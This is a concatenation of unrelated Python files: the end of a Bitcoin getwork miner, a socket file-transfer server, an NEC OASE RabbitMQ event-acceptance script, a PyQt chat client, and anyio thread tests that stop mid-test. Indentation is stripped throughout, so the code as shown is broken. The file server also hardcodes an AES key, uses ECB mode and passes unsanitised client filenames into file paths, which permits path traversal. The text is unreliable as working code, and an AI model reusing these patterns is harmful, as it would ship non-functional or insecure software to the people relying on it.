def iterate(self, rpc):
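        # Fetch work via getwork, time the nonce scan, adapt max_nonce to the configured scantime, and submit any solution found.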
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 8912
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
Server.py
|
import sys
import os
import socket
import struct
import threading
import time
from Crypto.Cipher import AES
# -*- coding: utf-8 -*-
# serverIp = '172.18.35.225'
serverIp = '192.168.199.218'
# Leo's laptop in dormitory
secretary_key = "project-C/S and P2P protocol key"
# serverIp = '127.0.0.1'
serverPort = 6789
messageSize = 1036
requestSize = 208
serverSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serverSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
serverSocket.bind((serverIp, serverPort))
serverSocket.listen(10)
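# NOTE: AES.new() with only a key defaults to ECB mode under legacy PyCrypto; pycryptodome would require an explicit mode argument.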
Encryptor = AES.new(secretary_key)
pad = b'\x00'
requestList = []
lineNum = 0
nowLine = 0
lock = threading.Lock()
class UnExist(Exception):
def __init__(self, arg="File does not exist, the connection is closed"):
super(UnExist, self).__init__(arg)
def myPrint(printStr, num=1):
global lineNum
lineNum += num
print(printStr)
def service():
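    # Accept incoming connections and hand each one off to a dealRequest worker thread.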
global lineNum
print("listening")
while True:
newsock, addrAndPort = serverSocket.accept()
lock.acquire()
if len(requestList) != 0:
myPrint("\n\n\nRequest accepted", 3)
else:
myPrint("\nRequest accepted", 2)
task = threading.Thread(
target=dealRequest, args=(newsock, addrAndPort))
task.start()
def dealRequest(sock, addrAndPort):
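    # Handle one client request: reqSer 1 = AES-encrypted file transfer, 2 = send the directory catalogue; the file is streamed back in fixed-size packets.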
# resourPath = 'D:\Resources'
resourPath = 'Resources'
global Encryptor
global lineNum, nowLine, requestList
printLine = 0
    myPrint("Tackling a request from " + str(addrAndPort))
request = sock.recv(requestSize)
reqPro, reqSer, reqVer, reqId, filename = struct.unpack('!4H200s', request)
# print(reqSer)
originreqSer = reqSer
if reqSer != 2:
filename = filename.decode().split('\00')[0]
myPrint("Sending file " + filename)
if reqSer == 1:
myPrint("Encrypted")
elif reqSer == 2:
with open(os.path.join(resourPath, "catalogueFile.txt"), "w") \
as catalogueFile:
catalogueFile.write(requestCatalogue())
filename = "catalogueFile.txt"
nowLine = lineNum
lock.release()
try:
if os.path.exists(os.path.join(resourPath, filename)):
errorCode = 0
FileSize = os.path.getsize(os.path.join(resourPath, filename))
filereq = os.path.join(resourPath, filename)
Sendsize = 0
if reqSer == 1:
FileSize += 16 - FileSize % 16
with open(os.path.join(resourPath, filename), 'rb') as sendFile:
while True:
lock.acquire()
dataBody = sendFile.read(messageSize - 12)
if not dataBody:
packet = struct.pack('!6H', reqPro, reqSer, reqVer,
reqId, 12, errorCode)
sock.sendall(packet)
if reqSer != 2:
print("\nThe file is sent")
nowLine += 1
lock.release()
break
else:
if reqSer == 1:
appended = (16 - (len(dataBody) % 16)) * pad
validLen = len(dataBody)
reqSer = validLen
dataBody += appended
dataBody = Encryptor.encrypt(dataBody)
packet = struct.pack(
'!6H%ds' % len(dataBody), reqPro, reqSer, reqVer,
reqId, 12 + len(dataBody), errorCode, dataBody)
sock.sendall(packet)
Sendsize += len(dataBody)
reqSer = originreqSer
if reqSer != 2:
if str(addrAndPort) not in requestList:
printLine = lineNum
lineNum += 1
requestList.append(str(addrAndPort))
if printLine == nowLine:
print(
"\rSend %f%%" %
((Sendsize / FileSize) * 100),
end='')
elif printLine < nowLine:
print(
'\x1b[%dA' %
(nowLine - printLine) + "\rSend %f%%" %
((Sendsize / FileSize) * 100),
end='')
else:
print(
'\x1b[%dB' %
(printLine - nowLine) + "\rSend %f%%" %
((Sendsize / FileSize) * 100),
end='')
nowLine = printLine
lock.release()
# sys.stdout.write("\rSend %f%%" %
# ((Sendsize / FileSize) * 100))
# sys.stdout.flush()
else:
errorCode = 1
packet = struct.pack('!6H', reqPro, reqSer, reqVer, reqId, 12,
errorCode)
sock.sendall(packet)
raise UnExist()
except UnExist as e:
myPrint(e.args)
except Exception as e:
myPrint(e.args)
# print(packet)
raise e
finally:
sock.close()
if str(addrAndPort) in requestList:
requestList.remove(str(addrAndPort))
if len(requestList) == 0:
print('\x1b[%dB' % (lineNum - nowLine) + '', end='')
def requestCatalogue(sourcePath='Resources', dirpath='.'):
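    # Recursively list the files under sourcePath (excluding catalogueFile.txt), one relative path per line.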
fileList = ""
dirpathFather, catalogueName, fileNames = next(os.walk(sourcePath))
fileNames.sort()
catalogueName.sort()
for i in fileNames:
if i != "catalogueFile.txt":
fileList += (os.path.join(dirpath, i) + "\n")
for i in catalogueName:
fileList += requestCatalogue(
os.path.join(sourcePath, i), os.path.join(dirpath, i))
return fileList
if __name__ == '__main__':
service()
|
oase_accept.py
|
# Copyright 2019 NEC Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
[Overview]
Operations platform integration processing
"""
import os
import sys
import django
import json
import pytz
import datetime
import subprocess
import traceback
import ast
import pika
import time
import threading
import copy
from time import sleep
# --------------------------------
# Get environment variables
# --------------------------------
try:
oase_root_dir = os.environ['OASE_ROOT_DIR']
run_interval = os.environ['RUN_INTERVAL']
python_module = os.environ['PYTHON_MODULE']
log_level = os.environ['LOG_LEVEL']
except Exception as e:
oase_root_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), '../../')
run_interval = "10"
python_module = "/usr/bin/python3"
log_level = "NORMAL"
# --------------------------------
# Add path
# --------------------------------
sys.path.append(oase_root_dir)
# --------------------------------
# Load django
# --------------------------------
os.environ['DJANGO_SETTINGS_MODULE'] = 'confs.frameworkconfs.settings'
django.setup()
from django.shortcuts import render, redirect
from django.conf import settings
from django.http import HttpResponse
from django.views.decorators.csrf import csrf_exempt
from libs.backyardlibs.backyard_common import disconnect
from libs.commonlibs.oase_logger import OaseLogger
logger = OaseLogger.get_instance()  # Initialize logger
from web_app.models.models import User, EventsRequest, RuleType
from web_app.serializers.events_request import EventsRequestSerializer
from libs.commonlibs import define as defs
from libs.commonlibs.rabbitmq import RabbitMQ
from libs.webcommonlibs.events_request import EventsRequestCommon
from libs.webcommonlibs.common import TimeConversion
# Maximum count (records buffered before bulk insert)
MAX_COUNT = 100
THREAD_LOCK = threading.Lock()
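# Buffer of EventsRequest objects waiting to be bulk-inserted into the DB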
data_obj_list = []
################################################################
def check_key_error(trace_id, json_str):
"""
    [Method overview]
    Validity check of each key in the event request
    * Must be called inside a try block
"""
err_code = EventsRequestCommon.check_events_request_key(json_str)
if err_code != EventsRequestCommon.REQUEST_OK:
err_keyname = ''
if err_code == EventsRequestCommon.REQUEST_ERR_RULETYPE_KEY:
err_keyname = EventsRequestCommon.KEY_RULETYPE
elif err_code == EventsRequestCommon.REQUEST_ERR_REQTYPE_KEY:
err_keyname = EventsRequestCommon.KEY_REQTYPE
elif err_code == EventsRequestCommon.REQUEST_ERR_DATETIME_KEY:
err_keyname = EventsRequestCommon.KEY_EVENTTIME
elif err_code == EventsRequestCommon.REQUEST_ERR_EVINFO_KEY:
err_keyname = EventsRequestCommon.KEY_EVENTINFO
logger.user_log('LOSM22001', err_keyname, trace_id)
raise Exception()
################################################
def check_evinfo_error(trace_id, json_str, ruletypeid, evinfo_length):
"""
    [Method overview]
    Validity check of the event information in the event request
    * Must be called inside a try block
"""
    # Check the event information
err_code = EventsRequestCommon.check_events_request_len(
json_str, evinfo_length)
if err_code != EventsRequestCommon.REQUEST_OK:
if err_code == EventsRequestCommon.REQUEST_ERR_EVINFO_TYPE:
logger.user_log('LOSM22002', trace_id,
ruletypeid, 0, evinfo_length)
raise Exception()
elif err_code == EventsRequestCommon.REQUEST_ERR_EVINFO_LENGTH:
logger.user_log('LOSM22002', trace_id, ruletypeid, len(
json_str[EventsRequestCommon.KEY_EVENTINFO]), evinfo_length)
raise Exception()
raise Exception()
################################################
def make_evinfo_str(json_str):
"""
    [Method overview]
    Format the event information into a string for DB registration
"""
evinfo_str = ''
for v in json_str[EventsRequestCommon.KEY_EVENTINFO]:
if evinfo_str:
evinfo_str += ','
if not isinstance(v, list):
evinfo_str += '"%s"' % (v)
else:
temp_val = '['
for i, val in enumerate(v):
if i > 0:
temp_val += ','
temp_val += '"%s"' % (val)
temp_val += ']'
evinfo_str += '%s' % (temp_val)
return evinfo_str
################################################
def data_list(body, user, rule_type_id_list, label_count_list):
"""
    [Method overview]
    Build a list of the data to be registered in the DB.
"""
global data_obj_list
now = datetime.datetime.now(pytz.timezone('UTC'))
evinfo_length = 0
ruletypeid = 0
msg = ''
event_dt = '----/--/-- --:--:--'
disconnect()
try:
        # Check the format
try:
json_str = json.loads(body.decode('UTF-8'))
except json.JSONDecodeError:
logger.user_log('LOSM22000')
raise Exception()
trace_id = json_str[EventsRequestCommon.KEY_TRACEID]
logger.system_log('LOSI22000', trace_id)
        # Check the keys
check_key_error(trace_id, json_str)
        # Get the rule information
reqtypeid = json_str[EventsRequestCommon.KEY_REQTYPE]
ruletablename = json_str[EventsRequestCommon.KEY_RULETYPE]
if ruletablename not in rule_type_id_list:
rule_type_id_list.update({ruletablename: 0})
label_count_list.update({ruletablename: 0})
rset = RuleType.objects.filter(rule_type_name=ruletablename).values(
'rule_type_id', 'rule_type_name', 'label_count')
for rs in rset:
rule_type_id_list.update(
{rs['rule_type_name']: rs['rule_type_id']})
label_count_list.update(
{rs['rule_type_name']: rs['label_count']})
if ruletablename in rule_type_id_list:
ruletypeid = rule_type_id_list[ruletablename]
evinfo_length = label_count_list[ruletablename]
        # Check the event information
check_evinfo_error(trace_id, json_str, ruletypeid, evinfo_length)
        # Format for DB registration
evinfo_str = make_evinfo_str(json_str)
evinfo_str = '{"EVENT_INFO":[%s]}' % (evinfo_str)
event_dt = json_str[EventsRequestCommon.KEY_EVENTTIME]
event_dt = TimeConversion.get_time_conversion_utc(
event_dt, 'Asia/Tokyo')
json_data = {
'trace_id': trace_id,
'request_type_id': reqtypeid,
'rule_type_id': ruletypeid,
'request_reception_time': now,
'request_user': 'OASE Web User',
'request_server': 'OASE Web',
'event_to_time': event_dt,
'event_info': evinfo_str,
'status': defs.UNPROCESS,
'status_update_id': '',
'retry_cnt': 0,
'last_update_timestamp': now,
'last_update_user': user.user_name,
}
        # Validation check
oters = EventsRequestSerializer(data=json_data)
result_valid = oters.is_valid()
        # Validation error
if result_valid == False:
msg = '%s' % oters.errors
logger.user_log('LOSM22003', trace_id, msg)
return False
        # If valid, add to the registration list
else:
data_object = EventsRequest(
trace_id=trace_id,
request_type_id=reqtypeid,
rule_type_id=ruletypeid,
request_reception_time=now,
request_user='OASE Web User',
request_server='OASE Web',
event_to_time=event_dt,
event_info=evinfo_str,
status=defs.UNPROCESS,
status_update_id='',
retry_cnt=0,
last_update_timestamp=now,
last_update_user=user.user_name
)
data_obj_list.append(data_object)
return True
except Exception as e:
logger.system_log('LOSM22004', traceback.format_exc())
return False
################################################
def bulk_create():
"""
[メソッド概要]
EventsRequestテーブルに登録
"""
global data_obj_list
global thread_flg
try:
thread_flg = False
with THREAD_LOCK:
data_obj_len = len(data_obj_list)
if data_obj_len <= 0:
return
# Copy into a temporary array for registration
tmp_data = copy.deepcopy(data_obj_list)
data_obj_list = []
# Bulk insert into the DB
EventsRequest.objects.bulk_create(tmp_data)
# Clear the temporary array
tmp_data = []
except Exception as e:
logger.system_log('LOSM22005', traceback.format_exc())
################################################
def load_ruletype():
"""
[メソッド概要]
ルール種別管理テーブル情報を読み込む
"""
rule_type_id_list = {}
label_count_list = {}
ruletype = list(RuleType.objects.all().values(
'rule_type_id', 'rule_type_name', 'label_count'))
for rt in ruletype:
rule_type_id = {}
label_count = {}
rule_type_id[rt['rule_type_name']] = rt['rule_type_id']
label_count[rt['rule_type_name']] = rt['label_count']
rule_type_id_list.update(rule_type_id)
label_count_list.update(label_count)
return rule_type_id_list, label_count_list
################################################
if __name__ == '__main__':
# Initialization
loop_count = 0
thread_flg = False
# Load rule type data
rule_type_id_list, label_count_list = load_ruletype()
# Get startup configuration
user = User.objects.get(user_id=1)
accept_settings = RabbitMQ.settings()
# Connect to RabbitMQ
channel, connection = RabbitMQ.connect(accept_settings)
# Connect to the queue
channel.queue_declare(queue=accept_settings['queuename'], durable=True)
# Consume loop
for method_frame, properties, body in channel.consume(accept_settings['queuename']):
if method_frame:
# Build the DB registration list
_ = data_list(body, user, rule_type_id_list, label_count_list)
# Acknowledge the message fetched from RabbitMQ
channel.basic_ack(method_frame.delivery_tag)
# Update the loop count
loop_count = len(data_obj_list)
# Register to the DB when the commit count is reached
if loop_count >= MAX_COUNT:
thread_flg = True
thrd = threading.Thread(target=bulk_create)
thrd.start()
elif not thread_flg:
thread_flg = True
thrd = threading.Timer(0.1, bulk_create)
thrd.start()
# Close the channel and connection, just in case
channel.close()
connection.close()
|
client.py
|
"""
MIT License
Copyright (c) 2021 CarlFandino
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from PyQt5 import QtWidgets,QtCore,QtGui,uic
import socket
import threading,time
class RegisterUi(QtWidgets.QWidget):
def __init__(self,parent=None):
super(RegisterUi,self).__init__(parent)
uic.loadUi("register_ui.ui",self)
class MessageFrame(QtWidgets.QLabel):
def __init__(self,animBool,y,text,sender,parent=None,x=650,width=151,height=31):
super(MessageFrame,self).__init__()
self.Message_2 = QtWidgets.QLabel(parent)
self.Message_2.setEnabled(True)
self.Message_2.setStyleSheet("border:none;\n"
"border-radius:10px;\n"
"background-color: rgb(255, 74, 74);\n"
"color: rgb(255, 255, 255);")
self.Message_2.setAlignment(QtCore.Qt.AlignCenter)
self.Message_2.setText(text)
self.Message_2.setGeometry(QtCore.QRect(x, y,width, height))
self.FromYou = QtWidgets.QLabel(parent)
self.FromYou.setGeometry(QtCore.QRect(x+30, y-20, 111, 16))
font = QtGui.QFont()
font.setFamily("Microsoft JhengHei UI")
font.setPointSize(10)
font.setBold(False)
font.setWeight(50)
self.FromYou.setFont(font)
self.FromYou.setStyleSheet("border:none;\n"
"border-radius:10px;\n"
"background-color:transparent;\n"
"color: rgb(0, 0, 0);")
self.FromYou.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.FromYou.setText(f"From {sender}")
self.Message_2.show()
self.FromYou.show()
if animBool == True:
self.anim(y)
else:
self.Message_2.setGeometry(QtCore.QRect(350, y, 151, 31))
self.FromYou.setGeometry(QtCore.QRect(380, y-20, 111, 16))
def anim(self,y):
self.animMessage = QtCore.QPropertyAnimation(self.Message_2,b"pos")
self.animMessage.setEndValue(QtCore.QPoint(350,y))
self.animMessage.setEasingCurve(QtCore.QEasingCurve.InOutCubic)
self.animMessage.setDuration(100)
self.animMessage.start()
self.animMessage2 = QtCore.QPropertyAnimation(self.FromYou,b"pos")
self.animMessage2.setEndValue(QtCore.QPoint(380,y-20))
self.animMessage2.setEasingCurve(QtCore.QEasingCurve.InOutCubic)
self.animMessage2.setDuration(100)
self.animMessage2.start()
class ClientMessage(QtWidgets.QLabel):
def __init__(self,animBool,y,text,sender,parent=None,x=-200,width=151,height=31):
super(ClientMessage,self).__init__()
self.Message_3 = QtWidgets.QLabel(parent)
self.Message_3.setGeometry(QtCore.QRect(x, y, width, height))
self.Message_3.setStyleSheet("border:none;\n"
"border-radius:10px;\n"
"background-color: rgb(255, 152, 152);\n"
"color: rgb(255, 255, 255);")
self.Message_3.setAlignment(QtCore.Qt.AlignCenter)
self.Message_3.setObjectName("Message_3")
self.Message_3.setText(text)
self.FromClient = QtWidgets.QLabel(parent)
self.FromClient.setGeometry(QtCore.QRect(30, 70, 111, 16))
font = QtGui.QFont()
font.setFamily("Microsoft JhengHei UI")
font.setPointSize(10)
font.setBold(True)
font.setWeight(75)
self.FromClient.setFont(font)
self.FromClient.setStyleSheet("border:none;\n"
"border-radius:10px;\n"
"background-color:transparent;\n"
"color: rgb(0, 0, 0);")
self.FromClient.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
self.FromClient.setObjectName("FromClient")
self.FromClient.setText(f"From {sender}")
self.Message_3.show()
self.FromClient.show()
if animBool == True:
self.anim(y)
else:
self.Message_3.setGeometry(QtCore.QRect(20,y,151,31))
self.FromClient.setGeometry(QtCore.QRect(20, y-20, 111, 16))
def anim(self,y):
self.animMessage = QtCore.QPropertyAnimation(self.Message_3,b"pos")
self.animMessage.setEndValue(QtCore.QPoint(20,y))
self.animMessage.setEasingCurve(QtCore.QEasingCurve.InOutCubic)
self.animMessage.setDuration(100)
self.animMessage.start()
self.animMessage2 = QtCore.QPropertyAnimation(self.FromClient,b"pos")
self.animMessage2.setEndValue(QtCore.QPoint(20,y-20))
self.animMessage2.setEasingCurve(QtCore.QEasingCurve.InOutCubic)
self.animMessage2.setDuration(100)
self.animMessage2.start()
class SystemMessage(QtWidgets.QLabel):
def __init__(self,animBool,y,text,parent=None,x=690,width=151,height=31):
super(SystemMessage,self).__init__()
self.y = y
self.x = x
self.parent = parent
self.width = width
self.height = height
self.text = text
self.Message_5 = QtWidgets.QLabel(self.parent)
self.Message_5.setGeometry(QtCore.QRect(self.x, self.y, self.width, self.height))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.Message_5.setFont(font)
self.Message_5.setStyleSheet("border:none;\n"
"border-radius:10px;\n"
"background-color:transparent;\n"
"color: rgb(0, 0, 0);")
self.Message_5.setAlignment(QtCore.Qt.AlignCenter)
self.Message_5.setText(self.text)
self.Message_5.show()
if animBool == True:
self.anim(y)
else:
self.Message_5.setGeometry(190,y,151,31)
def anim(self,y):
self.animMessage = QtCore.QPropertyAnimation(self.Message_5,b"pos")
self.animMessage.setEndValue(QtCore.QPoint(190,y))
self.animMessage.setEasingCurve(QtCore.QEasingCurve.InOutCubic)
self.animMessage.setDuration(100)
self.animMessage.start()
class Client:
def __init__(self,ip,port):
self.socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.ip,self.port = ip,port
def connect(self):
self.socket.connect((self.ip,self.port))
def sendMessage(self,message):
self.socket.sendall(f"{message}".encode())
def getServerMessage(self):
try:
self.serverMessage = self.socket.recv(1024).decode()
return str(self.serverMessage)
except:
pass
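# Minimal usage sketch for Client (illustrative only; assumes a compatible
# chat server listening on the given host and port):
#   client = Client("127.0.0.1", 8080)
#   client.connect()
#   client.sendMessage("nickname Alice")
#   reply = client.getServerMessage()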
class ChatRoom(QtWidgets.QMainWindow):
messageFromClientSig = QtCore.pyqtSignal(bool,str,str)
messageFromSystemSig = QtCore.pyqtSignal(bool,str)
changeHeightMessageScroll = QtCore.pyqtSignal(int)
messageFromMeSig = QtCore.pyqtSignal(str)
changeNoOnline = QtCore.pyqtSignal(str)
def __init__(self):
super(ChatRoom,self).__init__()
self.myname = ""
self.client = Client(socket.gethostbyname(socket.gethostname()),8080)
uic.loadUi("chat_room.ui",self)
self.mainUi = [self.Title,self.messageScroll,self.messageText,self.sendButton]
self.messageNo = 1
self.loadMessages = []
self.messageScrollHeight = 600
self.regUi = RegisterUi(self)
self.regUi.show()
for i in self.mainUi:
i.setVisible(False)
self.setSize(391,211)
self.pos_y = 20
self.regUi.connectButton.clicked.connect(self.connect)
self.sendButton.clicked.connect(self.sendMessage)
self.messageFromSystemSig.connect(self.messageFromSystem)
self.messageFromClientSig.connect(self.messageFromClient)
self.messageFromMeSig.connect(self.__loadYourMessages__)
self.changeHeightMessageScroll.connect(self.messageFrame.setMinimumHeight)
def setSize(self,width,height):
self.resize(width,height)
self.setFixedSize(width,height)
def connect(self):
name = self.regUi.nameInput.text()
self.myname = name
if name == "":
pass
else:
try:
self.client.connect()
self.__joinMessage__(name)
self.regUi.loginFrame.setVisible(False)
self.setSize(577,648)
threading.Thread(target=self.loopReceiveMessage,daemon=True).start()
for i in self.mainUi:
i.setVisible(True)
except ConnectionRefusedError:
print("Can't Connect.")
def sendMessage(self):
if self.messageText.text() == "":
pass
else:
self.client.sendMessage(f"chat {self.messageText.text()}")
self.messageNo += 1
self.Message = MessageFrame(True,self.pos_y,self.messageText.text(),self.myname,self.messageFrame)
self.Message.setMinimumSize(QtCore.QSize(0, self.messageScrollHeight))
self.messageText.setText("")
def __loadMessages__(self):
for i in self.loadMessages:
if i.split()[0] == "chat":
if i.split()[2] == self.myname:
myMessage = i.split()
text = ""
for a in range(4):
myMessage.pop(0)
for b in myMessage:
text += b+" "
self.messageFromMeSig.emit(text)
self.messageScrollHeight += 60
self.changeHeightMessageScroll.emit(self.messageScrollHeight)
else:
message = i.split()
text = ""
for a in range(4):
message.pop(0)
for b in message:
text += b+" "
self.messageFromClientSig.emit(False,text,i.split()[2])
if i.split()[0] == "join":
if i.split()[1] == self.myname:
self.messageFromSystemSig.emit(False,"You joined the chat.")
else:
self.messageFromSystemSig.emit(False,f"{i.split()[1]} joined the chat.")
if i.split()[0] == "left":
if i.split()[1] == self.myname:
self.messageFromSystemSig.emit(False,"You left the chat.")
else:
self.messageFromSystemSig.emit(False,f"{i.split()[1]} left the chat.")
def loopReceiveMessage(self):
while True:
try:
data = self.client.getServerMessage()
if data.split()[0] == "chat":
if data.split()[2] == self.myname:
self.pos_y += 60
self.messageScrollHeight += 60
self.changeHeightMessageScroll.emit(self.messageScrollHeight)
message = data.split()
text = ""
for a in range(4):
message.pop(0)
for b in message:
text += b+" "
else:
message = data.split()
text = ""
for a in range(4):
message.pop(0)
for b in message:
text += b+" "
self.messageFromClientSig.emit(True,text,data.split()[2])
if data.split()[0] == "join":
if data.split()[1] == self.myname:
pass
else:
self.messageFromSystemSig.emit(True,f"{data.split()[1]} joined the chat.")
if data.split()[0] == "left":
if data.split()[1] == self.myname:
pass
else:
self.messageFromSystemSig.emit(True,f"{data.split()[1]} left the chat.")
if data.split()[0] == "loadMessage":
listMessage = data.splitlines()[2].replace("[","").replace("]","").replace("'","")
self.loadMessages = listMessage.split(",")
self.__loadMessages__()
except Exception as e:
pass
def messageFromClient(self,animBool,text,sender):
self.clientMessage = ClientMessage(animBool,self.pos_y,text,sender,self.messageFrame)
self.pos_y += 60
self.messageNo += 1
self.messageScrollHeight += 60
self.changeHeightMessageScroll.emit(self.messageScrollHeight)
def messageFromSystem(self,animBool,text):
self.SystemMessage = SystemMessage(animBool,self.pos_y,text,self.messageFrame)
self.pos_y += 60
self.messageNo += 1
self.messageScrollHeight += 60
self.changeHeightMessageScroll.emit(self.messageScrollHeight)
def __loadYourMessages__(self,text):
self.__MyMessage__ = MessageFrame(False,self.pos_y, text, self.myname, self.messageFrame)
self.pos_y += 60
self.messageScrollHeight += 60
self.changeHeightMessageScroll.emit(self.messageScrollHeight)
def __joinMessage__(self,name):
self.client.sendMessage(f"nickname {name}")
self.messageFromSystemSig.emit(True,"You joined the chat.")
def __leftMessage__(self):
self.client.sendMessage(f"quit")
self.messageFromSystemSig.emit(True,"You left the chat.")
if __name__ == '__main__':
app = QtWidgets.QApplication([])
chatroom = ChatRoom()
def quitting():
try:
chatroom.__leftMessage__()
except:
pass
chatroom.show()
app.aboutToQuit.connect(quitting)
app.exec()
|
test_threads.py
|
import threading
import time
from concurrent.futures import CancelledError
from contextlib import suppress
import pytest
from anyio import (
create_blocking_portal, create_capacity_limiter, create_event, create_task_group,
run_async_from_thread, run_sync_in_worker_thread, sleep, start_blocking_portal)
pytestmark = pytest.mark.anyio
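# Module-level mark: every async test below is collected and run by the anyio
# pytest plugin, once per configured backend (via the anyio_backend fixture).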
async def test_run_async_from_thread():
async def add(a, b):
assert threading.get_ident() == event_loop_thread_id
return a + b
def worker(a, b):
assert threading.get_ident() != event_loop_thread_id
return run_async_from_thread(add, a, b)
event_loop_thread_id = threading.get_ident()
result = await run_sync_in_worker_thread(worker, 1, 2)
assert result == 3
async def test_run_anyio_async_func_from_thread():
def worker(*args):
run_async_from_thread(sleep, *args)
return True
assert await run_sync_in_worker_thread(worker, 0)
async def test_run_in_thread_cancelled():
def thread_worker():
nonlocal state
state = 2
async def worker():
nonlocal state
state = 1
await run_sync_in_worker_thread(thread_worker)
state = 3
state = 0
async with create_task_group() as tg:
await tg.spawn(worker)
await tg.cancel_scope.cancel()
assert state == 1
async def test_run_in_thread_exception():
def thread_worker():
raise ValueError('foo')
with pytest.raises(ValueError) as exc:
await run_sync_in_worker_thread(thread_worker)
exc.match('^foo$')
async def test_run_in_custom_limiter():
def thread_worker():
nonlocal num_active_threads, max_active_threads
num_active_threads += 1
max_active_threads = max(num_active_threads, max_active_threads)
event.wait(1)
num_active_threads -= 1
async def task_worker():
await run_sync_in_worker_thread(thread_worker, limiter=limiter)
event = threading.Event()
num_active_threads = max_active_threads = 0
limiter = create_capacity_limiter(3)
async with create_task_group() as tg:
for _ in range(4):
await tg.spawn(task_worker)
await sleep(0.1)
assert num_active_threads == 3
assert limiter.borrowed_tokens == 3
event.set()
assert num_active_threads == 0
assert max_active_threads == 3
def test_run_async_from_unclaimed_thread():
async def foo():
pass
exc = pytest.raises(RuntimeError, run_async_from_thread, foo)
exc.match('This function can only be run from an AnyIO worker thread')
@pytest.mark.parametrize('cancellable, expected_last_active', [
(False, 'task'),
(True, 'thread')
], ids=['uncancellable', 'cancellable'])
async def test_cancel_worker_thread(cancellable, expected_last_active):
"""
Test that when a task running a worker thread is cancelled, the cancellation is not acted on
until the thread finishes.
"""
def thread_worker():
nonlocal last_active
run_async_from_thread(sleep_event.set)
time.sleep(0.2)
last_active = 'thread'
run_async_from_thread(finish_event.set)
async def task_worker():
nonlocal last_active
try:
await run_sync_in_worker_thread(thread_worker, cancellable=cancellable)
finally:
last_active = 'task'
sleep_event = create_event()
finish_event = create_event()
last_active = None
async with create_task_group() as tg:
await tg.spawn(task_worker)
await sleep_event.wait()
await tg.cancel_scope.cancel()
await finish_event.wait()
assert last_active == expected_last_active
class TestBlockingPortal:
async def test_successful_call(self):
async def async_get_thread_id():
return threading.get_ident()
def external_thread():
thread_ids.append(portal.call(threading.get_ident))
thread_ids.append(portal.call(async_get_thread_id))
thread_ids = []
async with create_blocking_portal() as portal:
thread = threading.Thread(target=external_thread)
thread.start()
await run_sync_in_worker_thread(thread.join)
for thread_id in thread_ids:
assert thread_id == threading.get_ident()
async def test_aexit_with_exception(self):
"""Test that when the portal exits with an exception, all tasks are cancelled."""
def external_thread():
try:
portal.call(sleep, 3)
except BaseException as exc:
results.append(exc)
else:
results.append(None)
results = []
with suppress(Exception):
async with create_blocking_portal() as portal:
thread1 = threading.Thread(target=external_thread)
thread1.start()
thread2 = threading.Thread(target=external_thread)
thread2.start()
await sleep(0.1)
assert not results
raise Exception
